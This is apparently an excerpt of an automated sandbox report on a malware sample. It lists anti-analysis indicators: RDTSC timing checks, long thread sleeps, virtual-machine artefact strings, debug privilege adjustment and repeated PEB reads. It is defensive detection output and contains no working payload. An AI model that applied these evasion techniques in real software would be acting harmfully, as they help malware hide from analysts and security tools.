          Source: C:\Users\user\Desktop\GCeHcfCef8.exeRDTSC instruction interceptor: First address: 0000000000409B7E second address: 0000000000409B84 instructions: 0x00000000 rdtsc 0x00000002 xor ecx, ecx 0x00000004 add ecx, eax 0x00000006 rdtsc
          Source: C:\Windows\SysWOW64\cmmon32.exeRDTSC instruction interceptor: First address: 0000000000409904 second address: 000000000040990A instructions: 0x00000000 rdtsc 0x00000002 xor ecx, ecx 0x00000004 add ecx, eax 0x00000006 rdtsc
          Source: C:\Windows\SysWOW64\cmmon32.exeRDTSC instruction interceptor: First address: 0000000000409B7E second address: 0000000000409B84 instructions: 0x00000000 rdtsc 0x00000002 xor ecx, ecx 0x00000004 add ecx, eax 0x00000006 rdtsc
          Source: C:\Windows\explorer.exeDecision node followed by non-executed suspicious API: DecisionNode, Non Executed (send or recv or WinExec)graph_3-13940
          Source: C:\Users\user\Desktop\GCeHcfCef8.exe TID: 372Thread sleep time: -35529s >= -30000sJump to behavior
          Source: C:\Users\user\Desktop\GCeHcfCef8.exe TID: 2736Thread sleep time: -922337203685477s >= -30000sJump to behavior
          Source: C:\Windows\explorer.exe TID: 7000Thread sleep count: 6341 > 30Jump to behavior
          Source: C:\Windows\explorer.exe TID: 7000Thread sleep time: -12682000s >= -30000sJump to behavior
          Source: C:\Windows\explorer.exe TID: 7000Thread sleep count: 3588 > 30Jump to behavior
          Source: C:\Windows\explorer.exe TID: 7000Thread sleep time: -7176000s >= -30000sJump to behavior
          Source: C:\Windows\SysWOW64\cmmon32.exe TID: 2360Thread sleep count: 957 > 30Jump to behavior
          Source: C:\Windows\SysWOW64\cmmon32.exe TID: 2360Thread sleep time: -1914000s >= -30000sJump to behavior
          Source: C:\Windows\SysWOW64\cmmon32.exe TID: 2360Thread sleep count: 9014 > 30Jump to behavior
          Source: C:\Windows\SysWOW64\cmmon32.exe TID: 2360Thread sleep time: -18028000s >= -30000sJump to behavior
          Source: C:\Windows\SysWOW64\cmmon32.exeLast function: Thread delayed
          Source: C:\Windows\SysWOW64\cmmon32.exeLast function: Thread delayed
          Source: C:\Users\user\Desktop\GCeHcfCef8.exeCode function: 2_2_00409AB0 rdtsc 2_2_00409AB0
          Source: C:\Users\user\Desktop\GCeHcfCef8.exeThread delayed: delay time: 922337203685477Jump to behavior
          Source: C:\Windows\explorer.exeWindow / User API: threadDelayed 6341Jump to behavior
          Source: C:\Windows\explorer.exeWindow / User API: threadDelayed 3588Jump to behavior
          Source: C:\Windows\explorer.exeWindow / User API: foregroundWindowGot 877Jump to behavior
          Source: C:\Windows\explorer.exeWindow / User API: foregroundWindowGot 869Jump to behavior
          Source: C:\Windows\SysWOW64\cmmon32.exeWindow / User API: threadDelayed 957Jump to behavior
          Source: C:\Windows\SysWOW64\cmmon32.exeWindow / User API: threadDelayed 9014Jump to behavior
          Source: C:\Users\user\Desktop\GCeHcfCef8.exeAPI coverage: 1.7 %
          Source: C:\Windows\SysWOW64\cmmon32.exeAPI coverage: 1.9 %
          Source: C:\Users\user\Desktop\GCeHcfCef8.exeProcess information queried: ProcessInformationJump to behavior
          Source: C:\Users\user\Desktop\GCeHcfCef8.exeThread delayed: delay time: 35529Jump to behavior
          Source: C:\Users\user\Desktop\GCeHcfCef8.exeThread delayed: delay time: 922337203685477Jump to behavior
          Source: explorer.exe, 00000003.00000002.3804772422.00000000087C2000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.3083531825.00000000087C2000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000000.1327499164.00000000087C2000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW6
          Source: explorer.exe, 00000003.00000003.2192098195.00000000087FE000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: SCSI\Disk&Ven_VMware&Prod_Virtual_disk\4&1656f219&0&000000
          Source: explorer.exe, 00000003.00000002.3805799384.00000000088E5000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: SCSI\CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00\4&224f42ef&0&000000r
          Source: explorer.exe, 00000003.00000002.3805799384.00000000088E5000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: \\?\scsi#cdrom&ven_necvmwar&prod_vmware_sata_cd00#4&224f42ef&0&000000#{53f56308-b6bf-11d0-94f2-00a0c91efb8b}Z
          Source: explorer.exe, 00000003.00000000.1327499164.0000000008761000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: v@oem2.inf,%loc.vmwarebusdevicedesc%;VMware VMCI Bus Device
          Source: explorer.exe, 00000003.00000003.2192098195.00000000087FE000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: NXTVMWare
          Source: explorer.exe, 00000003.00000002.3805799384.00000000088E5000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: \\?\scsi#cdrom&ven_necvmwar&prod_vmware_sata_cd00#4&224f42ef&0&000000#{53f56308-b6bf-11d0-94f2-00a0c91efb8b}otti
          Source: explorer.exe, 00000003.00000002.3804772422.00000000087C2000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.3083531825.00000000087C2000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000000.1327499164.00000000087C2000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW
          Source: explorer.exe, 00000003.00000002.3791650388.00000000005A0000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: SCSI\DISK&VEN_VMWARE&PROD_VIRTUAL_DISK\4&1656F219&0&000000\
          Source: explorer.exe, 00000003.00000000.1325316023.0000000004027000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: \\?\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#4&224f42ef&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}s/U6
          Source: explorer.exe, 00000003.00000002.3804772422.0000000008761000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000000.1327499164.0000000008761000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW@
          Source: explorer.exe, 00000003.00000002.3791650388.00000000005A0000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: SCSI\DISK&VEN_VMWARE&PROD_VIRTUAL_DISK\4&1656F219&0&000000
          Source: explorer.exe, 00000003.00000002.3805799384.00000000088E5000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: SCSI\CDROM&VEN_NECVMWAR&PROD_VMWARE_SATA_CD00\4&224F42EF&0&000000
          Source: C:\Users\user\Desktop\GCeHcfCef8.exeCode function: 2_2_00409AB0 rdtsc 2_2_00409AB0
          Source: C:\Users\user\Desktop\GCeHcfCef8.exeProcess token adjusted: DebugJump to behavior
          Source: C:\Users\user\Desktop\GCeHcfCef8.exeProcess token adjusted: DebugJump to behavior
          Source: C:\Users\user\Desktop\GCeHcfCef8.exeCode function: 2_2_01778158 mov eax, dword ptr fs:[00000030h]2_2_01778158
          Source: C:\Users\user\Desktop\GCeHcfCef8.exeCode function: 2_2_01774144 mov eax, dword ptr fs:[00000030h]2_2_01774144
          Source: C:\Users\user\Desktop\GCeHcfCef8.exeCode function: 2_2_01774144 mov eax, dword ptr fs:[00000030h]2_2_01774144
          Source: C:\Users\user\Desktop\GCeHcfCef8.exeCode function: 2_2_01774144 mov ecx, dword ptr fs:[00000030h]2_2_01774144
          Source: C:\Users\user\Desktop\GCeHcfCef8.exeCode function: 2_2_01774144 mov eax, dword ptr fs:[00000030h]2_2_01774144
          Source: C:\Users\user\Desktop\GCeHcfCef8.exeCode function: 2_2_01774144 mov eax, dword ptr fs:[00000030h]2_2_01774144
          Source: C:\Users\user\Desktop\GCeHcfCef8.exeCode function: 2_2_016E6154 mov eax, dword ptr fs:[00000030h]2_2_016E6154
          Source: C:\Users\user\Desktop\GCeHcfCef8.exeCode function: 2_2_016E6154 mov eax, dword ptr fs:[00000030h]2_2_016E6154
          Source: C:\Users\user\Desktop\GCeHcfCef8.exeCode function: 2_2_016DC156 mov eax, dword ptr fs:[00000030h]2_2_016DC156
          Source: C:\Users\user\Desktop\GCeHcfCef8.exeCode function: 2_2_01710124 mov eax, dword ptr fs:[00000030h]2_2_01710124
          Source: C:\Users\user\Desktop\GCeHcfCef8.exeCode function: 2_2_0178A118 mov ecx, dword ptr fs:[00000030h]2_2_0178A118
          Source: C:\Users\user\Desktop\GCeHcfCef8.exeCode function: 2_2_0178A118 mov eax, dword ptr fs:[00000030h]2_2_0178A118
          Source: C:\Users\user\Desktop\GCeHcfCef8.exeCode function: 2_2_0178A118 mov eax, dword ptr fs:[00000030h]2_2_0178A118
          Source: C:\Users\user\Desktop\GCeHcfCef8.exeCode function: 2_2_0178A118 mov eax, dword ptr fs:[00000030h]2_2_0178A118
          Source: C:\Users\user\Desktop\GCeHcfCef8.exeCode function: 2_2_017A0115 mov eax, dword ptr fs:[00000030h]2_2_017A0115
          Source: C:\Users\user\Desktop\GCeHcfCef8.exeCode function: 2_2_0178E10E mov eax, dword ptr fs:[00000030h]2_2_0178E10E
          Source: C:\Users\user\Desktop\GCeHcfCef8.exeCode function: 2_2_0178E10E mov ecx, dword ptr fs:[00000030h]2_2_0178E10E
          Source: C:\Users\user\Desktop\GCeHcfCef8.exeCode function: 2_2_0178E10E mov eax, dword ptr fs:[00000030h]2_2_0178E10E
          Source: C:\Users\user\Desktop\GCeHcfCef8.exeCode function: 2_2_0178E10E mov eax, dword ptr fs:[00000030h]2_2_0178E10E
          Source: C:\Users\user\Desktop\GCeHcfCef8.exeCode function: 2_2_0178E10E mov ecx, dword ptr fs:[00000030h]2_2_0178E10E
          Source: C:\Users\user\Desktop\GCeHcfCef8.exeCode function: 2_2_0178E10E mov eax, dword ptr fs:[00000030h]2_2_0178E10E
          Source: C:\Users\user\Desktop\GCeHcfCef8.exeCode function: 2_2_0178E10E mov eax, dword ptr fs:[00000030h]2_2_0178E10E
          Source: C:\Users\user\Desktop\GCeHcfCef8.exeCode function: 2_2_0178E10E mov ecx, dword ptr fs:[00000030h]2_2_0178E10E
          Source: C:\Users\user\Desktop\GCeHcfCef8.exeCode function: 2_2_0178E10E mov eax, dword ptr fs:[00000030h]2_2_0178E10E
          Source: C:\Users\user\Desktop\GCeHcfCef8.exeCode function: 2_2_0178E10E mov ecx, dword ptr fs:[00000030h]2_2_0178E10E
          Source: C:\Users\user\Desktop\GCeHcfCef8.exeCode function: 2_2_017101F8 mov eax, dword ptr fs:[00000030h]2_2_017101F8
          Source: C:\Users\user\Desktop\GCeHcfCef8.exeCode function: 2_2_017B61E5 mov eax, dword ptr fs:[00000030h]2_2_017B61E5
          Source: C:\Users\user\Desktop\GCeHcfCef8.exeCode function: 2_2_0175E1D0 mov eax, dword ptr fs:[00000030h]2_2_0175E1D0
          Source: C:\Users\user\Desktop\GCeHcfCef8.exeCode function: 2_2_0175E1D0 mov eax, dword ptr fs:[00000030h]2_2_0175E1D0
          Source: C:\Users\user\Desktop\GCeHcfCef8.exeCode function: 2_2_0175E1D0 mov ecx, dword ptr fs:[00000030h]2_2_0175E1D0
          Source: C:\Users\user\Desktop\GCeHcfCef8.exeCode function: 2_2_0175E1D0 mov eax, dword ptr fs:[00000030h]2_2_0175E1D0
          Source: C:\Users\user\Desktop\GCeHcfCef8.exeCode function: 2_2_0175E1D0 mov eax, dword ptr fs:[00000030h]2_2_0175E1D0
          Source: C:\Users\user\Desktop\GCeHcfCef8.exeCode function: 2_2_017A61C3 mov eax, dword ptr fs:[00000030h]2_2_017A61C3
          Source: C:\Users\user\Desktop\GCeHcfCef8.exeCode function: 2_2_017A61C3 mov eax, dword ptr fs:[00000030h]2_2_017A61C3
          Source: C:\Users\user\Desktop\GCeHcfCef8.exeCode function: 2_2_0176019F mov eax, dword ptr fs:[00000030h]2_2_0176019F
          Source: C:\Users\user\Desktop\GCeHcfCef8.exeCode function: 2_2_0176019F mov eax, dword ptr fs:[00000030h]2_2_0176019F
          Source: C:\Users\user\Desktop\GCeHcfCef8.exeCode function: 2_2_0176019F mov eax, dword ptr fs:[00000030h]2_2_0176019F
          Source: C:\Users\user\Desktop\GCeHcfCef8.exeCode function: 2_2_0176019F mov eax, dword ptr fs:[00000030h]2_2_0176019F
          Source: C:\Users\user\Desktop\GCeHcfCef8.exeCode function: 2_2_0179C188 mov eax, dword ptr fs:[00000030h]2_2_0179C188
          Source: C:\Users\user\Desktop\GCeHcfCef8.exeCode function: 2_2_0179C188 mov eax, dword ptr fs:[00000030h]2_2_0179C188
          Source: C:\Users\user\Desktop\GCeHcfCef8.exeCode function: 2_2_01720185 mov eax, dword ptr fs:[00000030h]2_2_01720185
          Source: C:\Users\user\Desktop\GCeHcfCef8.exeCode function: 2_2_01784180 mov eax, dword ptr fs:[00000030h]2_2_01784180
          Source: C:\Users\user\Desktop\GCeHcfCef8.exeCode function: 2_2_01784180 mov eax, dword ptr fs:[00000030h]2_2_01784180
          Source: C:\Users\user\Desktop\GCeHcfCef8.exeCode function: 2_2_016DA197 mov eax, dword ptr fs:[00000030h]2_2_016DA197
          Source: C:\Users\user\Desktop\GCeHcfCef8.exeCode function: 2_2_016DA197 mov eax, dword ptr fs:[00000030h]2_2_016DA197
          Source: C:\Users\user\Desktop\GCeHcfCef8.exeCode function: 2_2_016DA197 mov eax, dword ptr fs:[00000030h]2_2_016DA197
          Source: C:\Users\user\Desktop\GCeHcfCef8.exeCode function: 2_2_0170C073 mov eax, dword ptr fs:[00000030h]2_2_0170C073
          Source: C:\Users\user\Desktop\GCeHcfCef8.exeCode function: 2_2_01766050 mov eax, dword ptr fs:[00000030h]2_2_01766050
          Source: C:\Users\user\Desktop\GCeHcfCef8.exeCode function: 2_2_016E2050 mov eax, dword ptr fs:[00000030h]2_2_016E2050
          Source: C:\Users\user\Desktop\GCeHcfCef8.exeCode function: 2_2_01776030 mov eax, dword ptr fs:[00000030h]2_2_01776030
          Source: C:\Users\user\Desktop\GCeHcfCef8.exeCode function: 2_2_016DA020 mov eax, dword ptr fs:[00000030h]2_2_016DA020
          Source: C:\Users\user\Desktop\GCeHcfCef8.exeCode function: 2_2_016DC020 mov eax, dword ptr fs:[00000030h]2_2_016DC020
          Source: C:\Users\user\Desktop\GCeHcfCef8.exeCode function: 2_2_01764000 mov ecx, dword ptr fs:[00000030h]2_2_01764000
          Source: C:\Users\user\Desktop\GCeHcfCef8.exeCode function: 2_2_01782000 mov eax, dword ptr fs:[00000030h]2_2_01782000
          Source: C:\Users\user\Desktop\GCeHcfCef8.exeCode function: 2_2_01782000 mov eax, dword ptr fs:[00000030h]2_2_01782000
          Source: C:\Users\user\Desktop\GCeHcfCef8.exeCode function: 2_2_01782000 mov eax, dword ptr fs:[00000030h]2_2_01782000
          Source: C:\Users\user\Desktop\GCeHcfCef8.exeCode function: 2_2_01782000 mov eax, dword ptr fs:[00000030h]2_2_01782000
          Source: C:\Users\user\Desktop\GCeHcfCef8.exeCode function: 2_2_01782000 mov eax, dword ptr fs:[00000030h]2_2_01782000
          Source: C:\Users\user\Desktop\GCeHcfCef8.exeCode function: 2_2_01782000 mov eax, dword ptr fs:[00000030h]2_2_01782000
          Source: C:\Users\user\Desktop\GCeHcfCef8.exeCode function: 2_2_01782000 mov eax, dword ptr fs:[00000030h]2_2_01782000
          Source: C:\Users\user\Desktop\GCeHcfCef8.exeCode function: 2_2_01782000 mov eax, dword ptr fs:[00000030h]2_2_01782000
          Source: C:\Users\user\Desktop\GCeHcfCef8.exeCode function: 2_2_016FE016 mov eax, dword ptr fs:[00000030h]2_2_016FE016
          Source: C:\Users\user\Desktop\GCeHcfCef8.exeCode function: 2_2_016FE016 mov eax, dword ptr fs:[00000030h]2_2_016FE016
          Source: C:\Users\user\Desktop\GCeHcfCef8.exeCode function: 2_2_016FE016 mov eax, dword ptr fs:[00000030h]2_2_016FE016
          Source: C:\Users\user\Desktop\GCeHcfCef8.exeCode function: 2_2_016FE016 mov eax, dword ptr fs:[00000030h]2_2_016FE016
          Source: C:\Users\user\Desktop\GCeHcfCef8.exeCode function: 2_2_017220F0 mov ecx, dword ptr fs:[00000030h]2_2_017220F0
          Source: C:\Users\user\Desktop\GCeHcfCef8.exeCode function: 2_2_016E80E9 mov eax, dword ptr fs:[00000030h]2_2_016E80E9
          Source: C:\Users\user\Desktop\GCeHcfCef8.exeCode function: 2_2_016DA0E3 mov ecx, dword ptr fs:[00000030h]2_2_016DA0E3
          Source: C:\Users\user\Desktop\GCeHcfCef8.exeCode function: 2_2_017660E0 mov eax, dword ptr fs:[00000030h]2_2_017660E0
          Source: C:\Users\user\Desktop\GCeHcfCef8.exeCode function: 2_2_016DC0F0 mov eax, dword ptr fs:[00000030h]2_2_016DC0F0
          Source: C:\Users\user\Desktop\GCeHcfCef8.exeCode function: 2_2_017620DE mov eax, dword ptr fs:[00000030h]2_2_017620DE
          Source: C:\Users\user\Desktop\GCeHcfCef8.exeCode function: 2_2_017A60B8 mov eax, dword ptr fs:[00000030h]2_2_017A60B8
          Source: C:\Users\user\Desktop\GCeHcfCef8.exeCode function: 2_2_017A60B8 mov ecx, dword ptr fs:[00000030h]2_2_017A60B8
          Source: C:\Users\user\Desktop\GCeHcfCef8.exeCode function: 2_2_017780A8 mov eax, dword ptr fs:[00000030h]2_2_017780A8
          Source: C:\Users\user\Desktop\GCeHcfCef8.exeCode function: 2_2_016E208A mov eax, dword ptr fs:[00000030h]2_2_016E208A
          Source: C:\Users\user\Desktop\GCeHcfCef8.exeCode function: 2_2_0178437C mov eax, dword ptr fs:[00000030h]2_2_0178437C
          Source: C:\Users\user\Desktop\GCeHcfCef8.exeCode function: 2_2_017AA352 mov eax, dword ptr fs:[00000030h]2_2_017AA352
          Source: C:\Users\user\Desktop\GCeHcfCef8.exeCode function: 2_2_01788350 mov ecx, dword ptr fs:[00000030h]2_2_01788350
          Source: C:\Users\user\Desktop\GCeHcfCef8.exeCode function: 2_2_0176035C mov eax, dword ptr fs:[00000030h]2_2_0176035C
          Source: C:\Users\user\Desktop\GCeHcfCef8.exeCode function: 2_2_0176035C mov eax, dword ptr fs:[00000030h]2_2_0176035C
          Source: C:\Users\user\Desktop\GCeHcfCef8.exeCode function: 2_2_0176035C mov eax, dword ptr fs:[00000030h]2_2_0176035C
          Source: C:\Users\user\Desktop\GCeHcfCef8.exeCode function: 2_2_0176035C mov ecx, dword ptr fs:[00000030h]2_2_0176035C
          Source: C:\Users\user\Desktop\GCeHcfCef8.exeCode function: 2_2_0176035C mov eax, dword ptr fs:[00000030h]2_2_0176035C
          Source: C:\Users\user\Desktop\GCeHcfCef8.exeCode function: 2_2_0176035C mov eax, dword ptr fs:[00000030h]2_2_0176035C
          Source: C:\Users\user\Desktop\GCeHcfCef8.exeCode function: 2_2_01762349 mov eax, dword ptr fs:[00000030h]2_2_01762349
          Source: C:\Users\user\Desktop\GCeHcfCef8.exeCode function: 2_2_01762349 mov eax, dword ptr fs:[00000030h]2_2_01762349
          Source: C:\Users\user\Desktop\GCeHcfCef8.exeCode function: 2_2_01762349 mov eax, dword ptr fs:[00000030h]2_2_01762349
          Source: C:\Users\user\Desktop\GCeHcfCef8.exeCode function: 2_2_01762349 mov eax, dword ptr fs:[00000030h]2_2_01762349
          Source: C:\Users\user\Desktop\GCeHcfCef8.exeCode function: 2_2_01762349 mov eax, dword ptr fs:[00000030h]2_2_01762349
          Source: C:\Users\user\Desktop\GCeHcfCef8.exeCode function: 2_2_01762349 mov eax, dword ptr fs:[00000030h]2_2_01762349
          Source: C:\Users\user\Desktop\GCeHcfCef8.exeCode function: 2_2_01762349 mov eax, dword ptr fs:[00000030h]2_2_01762349
          Source: C:\Users\user\Desktop\GCeHcfCef8.exeCode function: 2_2_01762349 mov eax, dword ptr fs:[00000030h]2_2_01762349
          Source: C:\Users\user\Desktop\GCeHcfCef8.exeCode function: 2_2_01762349 mov eax, dword ptr fs:[00000030h]2_2_01762349
          Source: C:\Users\user\Desktop\GCeHcfCef8.exeCode function: 2_2_01762349 mov eax, dword ptr fs:[00000030h]2_2_01762349
          Source: C:\Users\user\Desktop\GCeHcfCef8.exeCode function: 2_2_01762349 mov eax, dword ptr fs:[00000030h]2_2_01762349
          Source: C:\Users\user\Desktop\GCeHcfCef8.exeCode function: 2_2_01762349 mov eax, dword ptr fs:[00000030h]2_2_01762349
          Source: C:\Users\user\Desktop\GCeHcfCef8.exeCode function: 2_2_01762349 mov eax, dword ptr fs:[00000030h]2_2_01762349
          Source: C:\Users\user\Desktop\GCeHcfCef8.exeCode function: 2_2_01762349 mov eax, dword ptr fs:[00000030h]2_2_01762349
          Source: C:\Users\user\Desktop\GCeHcfCef8.exeCode function: 2_2_01762349 mov eax, dword ptr fs:[00000030h]2_2_01762349
          Source: C:\Users\user\Desktop\GCeHcfCef8.exeCode function: 2_2_01700310 mov ecx, dword ptr fs:[00000030h]2_2_01700310
          Source: C:\Users\user\Desktop\GCeHcfCef8.exeCode function: 2_2_0171A30B mov eax, dword ptr fs:[00000030h]2_2_0171A30B
          Source: C:\Users\user\Desktop\GCeHcfCef8.exeCode function: 2_2_0171A30B mov eax, dword ptr fs:[00000030h]2_2_0171A30B
          Source: C:\Users\user\Desktop\GCeHcfCef8.exeCode function: 2_2_0171A30B mov eax, dword ptr fs:[00000030h]2_2_0171A30B
          Source: C:\Users\user\Desktop\GCeHcfCef8.exeCode function: 2_2_016DC310 mov ecx, dword ptr fs:[00000030h]2_2_016DC310
          Source: C:\Users\user\Desktop\GCeHcfCef8.exeCode function: 2_2_016F03E9 mov eax, dword ptr fs:[00000030h]2_2_016F03E9
          Source: C:\Users\user\Desktop\GCeHcfCef8.exeCode function: 2_2_016F03E9 mov eax, dword ptr fs:[00000030h]2_2_016F03E9
          Source: C:\Users\user\Desktop\GCeHcfCef8.exeCode function: 2_2_016F03E9 mov eax, dword ptr fs:[00000030h]2_2_016F03E9
          Source: C:\Users\user\Desktop\GCeHcfCef8.exeCode function: 2_2_016F03E9 mov eax, dword ptr fs:[00000030h]2_2_016F03E9
          Source: C:\Users\user\Desktop\GCeHcfCef8.exeCode function: 2_2_016F03E9 mov eax, dword ptr fs:[00000030h]2_2_016F03E9
          Source: C:\Users\user\Desktop\GCeHcfCef8.exeCode function: 2_2_016F03E9 mov eax, dword ptr fs:[00000030h]2_2_016F03E9
          Source: C:\Users\user\Desktop\GCeHcfCef8.exeCode function: 2_2_016F03E9 mov eax, dword ptr fs:[00000030h]2_2_016F03E9
          Source: C:\Users\user\Desktop\GCeHcfCef8.exeCode function: 2_2_016F03E9 mov eax, dword ptr fs:[00000030h]2_2_016F03E9
          Source: C:\Users\user\Desktop\GCeHcfCef8.exeCode function: 2_2_017163FF mov eax, dword ptr fs:[00000030h]2_2_017163FF
          Source: C:\Users\user\Desktop\GCeHcfCef8.exeCode function: 2_2_016FE3F0 mov eax, dword ptr fs:[00000030h]2_2_016FE3F0
          Source: C:\Users\user\Desktop\GCeHcfCef8.exeCode function: 2_2_016FE3F0 mov eax, dword ptr fs:[00000030h]2_2_016FE3F0
          Source: C:\Users\user\Desktop\GCeHcfCef8.exeCode function: 2_2_016FE3F0 mov eax, dword ptr fs:[00000030h]2_2_016FE3F0
          Source: C:\Users\user\Desktop\GCeHcfCef8.exeCode function: 2_2_0178E3DB mov eax, dword ptr fs:[00000030h]2_2_0178E3DB
          Source: C:\Users\user\Desktop\GCeHcfCef8.exeCode function: 2_2_0178E3DB mov eax, dword ptr fs:[00000030h]2_2_0178E3DB
          Source: C:\Users\user\Desktop\GCeHcfCef8.exeCode function: 2_2_0178E3DB mov ecx, dword ptr fs:[00000030h]2_2_0178E3DB
          Source: C:\Users\user\Desktop\GCeHcfCef8.exeCode function: 2_2_0178E3DB mov eax, dword ptr fs:[00000030h]2_2_0178E3DB
          Source: C:\Users\user\Desktop\GCeHcfCef8.exeCode function: 2_2_017843D4 mov eax, dword ptr fs:[00000030h]2_2_017843D4
          Source: C:\Users\user\Desktop\GCeHcfCef8.exeCode function: 2_2_017843D4 mov eax, dword ptr fs:[00000030h]2_2_017843D4
          Source: C:\Users\user\Desktop\GCeHcfCef8.exeCode function: 2_2_016EA3C0 mov eax, dword ptr fs:[00000030h]2_2_016EA3C0
          Source: C:\Users\user\Desktop\GCeHcfCef8.exeCode function: 2_2_016EA3C0 mov eax, dword ptr fs:[00000030h]2_2_016EA3C0
          Source: C:\Users\user\Desktop\GCeHcfCef8.exeCode function: 2_2_016EA3C0 mov eax, dword ptr fs:[00000030h]2_2_016EA3C0
          Source: C:\Users\user\Desktop\GCeHcfCef8.exeCode function: 2_2_016EA3C0 mov eax, dword ptr fs:[00000030h]2_2_016EA3C0
          Source: C:\Users\user\Desktop\GCeHcfCef8.exeCode function: 2_2_016EA3C0 mov eax, dword ptr fs:[00000030h]2_2_016EA3C0
          Source: C:\Users\user\Desktop\GCeHcfCef8.exeCode function: 2_2_016EA3C0 mov eax, dword ptr fs:[00000030h]2_2_016EA3C0
          Source: C:\Users\user\Desktop\GCeHcfCef8.exeCode function: 2_2_016E83C0 mov eax, dword ptr fs:[00000030h]2_2_016E83C0
          Source: C:\Users\user\Desktop\GCeHcfCef8.exeCode function: 2_2_016E83C0 mov eax, dword ptr fs:[00000030h]2_2_016E83C0
          Source: C:\Users\user\Desktop\GCeHcfCef8.exeCode function: 2_2_016E83C0 mov eax, dword ptr fs:[00000030h]2_2_016E83C0
          Source: C:\Users\user\Desktop\GCeHcfCef8.exeCode function: 2_2_016E83C0 mov eax, dword ptr fs:[00000030h]2_2_016E83C0
          Source: C:\Users\user\Desktop\GCeHcfCef8.exeCode function: 2_2_0179C3CD mov eax, dword ptr fs:[00000030h]2_2_0179C3CD
          Source: C:\Users\user\Desktop\GCeHcfCef8.exeCode function: 2_2_017663C0 mov eax, dword ptr fs:[00000030h]2_2_017663C0
          Source: C:\Users\user\Desktop\GCeHcfCef8.exeCode function: 2_2_016DE388 mov eax, dword ptr fs:[00000030h]2_2_016DE388
          Source: C:\Users\user\Desktop\GCeHcfCef8.exeCode function: 2_2_016DE388 mov eax, dword ptr fs:[00000030h]2_2_016DE388
          Source: C:\Users\user\Desktop\GCeHcfCef8.exeCode function: 2_2_016DE388 mov eax, dword ptr fs:[00000030h]2_2_016DE388
          Source: C:\Users\user\Desktop\GCeHcfCef8.exeCode function: 2_2_016D8397 mov eax, dword ptr fs:[00000030h]2_2_016D8397
          Source: C:\Users\user\Desktop\GCeHcfCef8.exeCode function: 2_2_016D8397 mov eax, dword ptr fs:[00000030h]2_2_016D8397
          Source: C:\Users\user\Desktop\GCeHcfCef8.exeCode function: 2_2_016D8397 mov eax, dword ptr fs:[00000030h]2_2_016D8397
          Source: C:\Users\user\Desktop\GCeHcfCef8.exeCode function: 2_2_0170438F mov eax, dword ptr fs:[00000030h]2_2_0170438F
          Source: C:\Users\user\Desktop\GCeHcfCef8.exeCode function: 2_2_0170438F mov eax, dword ptr fs:[00000030h]2_2_0170438F
          Source: C:\Users\user\Desktop\GCeHcfCef8.exeCode function: 2_2_016D826B mov eax, dword ptr fs:[00000030h]2_2_016D826B
          Source: C:\Users\user\Desktop\GCeHcfCef8.exeCode function: 2_2_01790274 mov eax, dword ptr fs:[00000030h]2_2_01790274
          Source: C:\Users\user\Desktop\GCeHcfCef8.exeCode function: 2_2_01790274 mov eax, dword ptr fs:[00000030h]2_2_01790274
          Source: C:\Users\user\Desktop\GCeHcfCef8.exeCode function: 2_2_01790274 mov eax, dword ptr fs:[00000030h]2_2_01790274
          Source: C:\Users\user\Desktop\GCeHcfCef8.exeCode function: 2_2_01790274 mov eax, dword ptr fs:[00000030h]2_2_01790274
          Source: C:\Users\user\Desktop\GCeHcfCef8.exeCode function: 2_2_01790274 mov eax, dword ptr fs:[00000030h]2_2_01790274
          Source: C:\Users\user\Desktop\GCeHcfCef8.exeCode function: 2_2_01790274 mov eax, dword ptr fs:[00000030h]2_2_01790274
          Source: C:\Users\user\Desktop\GCeHcfCef8.exeCode function: 2_2_01790274 mov eax, dword ptr fs:[00000030h]2_2_01790274
          Source: C:\Users\user\Desktop\GCeHcfCef8.exeCode function: 2_2_01790274 mov eax, dword ptr fs:[00000030h]2_2_01790274
          Source: C:\Users\user\Desktop\GCeHcfCef8.exeCode function: 2_2_01790274 mov eax, dword ptr fs:[00000030h]2_2_01790274
          Source: C:\Users\user\Desktop\GCeHcfCef8.exeCode function: 2_2_01790274 mov eax, dword ptr fs:[00000030h]2_2_01790274
          Source: C:\Users\user\Desktop\GCeHcfCef8.exeCode function: 2_2_01790274 mov eax, dword ptr fs:[00000030h]2_2_01790274
          Source: C:\Users\user\Desktop\GCeHcfCef8.exeCode function: 2_2_01790274 mov eax, dword ptr fs:[00000030h]2_2_01790274
          Source: C:\Users\user\Desktop\GCeHcfCef8.exeCode function: 2_2_016E4260 mov eax, dword ptr fs:[00000030h]2_2_016E4260
          Source: C:\Users\user\Desktop\GCeHcfCef8.exeCode function: 2_2_016E4260 mov eax, dword ptr fs:[00000030h]2_2_016E4260
          Source: C:\Users\user\Desktop\GCeHcfCef8.exeCode function: 2_2_016E4260 mov eax, dword ptr fs:[00000030h]2_2_016E4260
          Source: C:\Users\user\Desktop\GCeHcfCef8.exeCode function: 2_2_0179A250 mov eax, dword ptr fs:[00000030h]2_2_0179A250
          Source: C:\Users\user\Desktop\GCeHcfCef8.exeCode function: 2_2_0179A250 mov eax, dword ptr fs:[00000030h]2_2_0179A250
          Source: C:\Users\user\Desktop\GCeHcfCef8.exeCode function: 2_2_01768243 mov eax, dword ptr fs:[00000030h]2_2_01768243
          Source: C:\Users\user\Desktop\GCeHcfCef8.exeCode function: 2_2_01768243 mov ecx, dword ptr fs:[00000030h]2_2_01768243
